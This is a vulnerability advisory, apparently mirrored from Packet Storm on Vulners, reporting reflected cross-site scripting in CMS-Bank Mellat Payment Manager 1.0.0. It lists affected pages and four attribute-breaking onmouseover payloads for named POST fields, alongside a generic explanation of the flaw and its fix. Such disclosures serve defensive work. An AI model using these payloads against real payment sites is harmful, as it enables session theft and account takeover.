Lucene search
K

CMS-Bank Mellat Payment Manager 1.0.0 Cross Site Scripting

🗓️ 21 Jul 2023 00:00:00Reported by indoushkaType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 242 Views

CMS-Bank Mellat Payment Manager 1.0.0 Xss Vulnerability, Impact, and Fi

Code
`====================================================================================================================================  
| # Title : CMS-Bank Mellat Payment Manager v1.0.0 Xss Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 114.0.2 (64 bits) |   
| # Vendor : https://github.com/ |   
| # Dork : |  
====================================================================================================================================  
  
poc :  
  
[+] Dorking İn Google Or Other Search Enggine.   
  
[+] Cross site scripting (also referred to as XSS) is a vulnerability that allows an attacker to send malicious code   
(usually in the form of Javascript) to another user.   
Because a browser cannot know if the script should be trusted or not, it will execute the script in the user context   
allowing the attacker to access any cookies or session tokens retained by the browser.   
  
[+] Affected items :   
  
/bank/default.php   
/bank/index.php   
  
[+] The impact of this vulnerability :  
  
Malicious users may inject JavaScript, VBScript, ActiveX, HTML or Flash into a vulnerable application to fool a user in order to gather data   
from them. An attacker can steal the session cookie and take over the account, impersonating the user. It is also possible to modify   
the content of the page presented to the user.   
  
[+] How to fix this vulnerability :  
  
Your script should filter metacharacters from user input.  
Cross site scripting (also referred to as XSS) is a vulnerability that allows an attacker to send malicious code   
(usually in the form of Javascript) to another user. Because a browser cannot know if the script should be trusted or not,  
it will execute the script in the user context allowing the attacker to access any cookies or session tokens retained by the browser.   
  
[+] Attack details :  
  
URL encoded POST input PayAdditionalData was set to 01/01/1967" onmouseover=prompt(940051) bad="  
The input is reflected inside a tag parameter between double quotes.  
  
URL encoded POST input PayAmount was set to 1" onmouseover=prompt(911818) bad="  
The input is reflected inside a tag parameter between double quotes.  
  
URL encoded POST input pay_from was set to 1" onmouseover=prompt(965239) bad="  
The input is reflected inside a tag parameter between double quotes.  
  
URL encoded POST input pay_from1 was set to 1" onmouseover=prompt(951829) bad="  
The input is reflected inside a tag parameter between double quotes.  
  
Greetings to :=========================================================================================================================  
jericho * Larry W. Cashdollar * brutelogic* shadow_00715* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * ViRuS_Ra3cH * yasMouh |   
=======================================================================================================================================  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation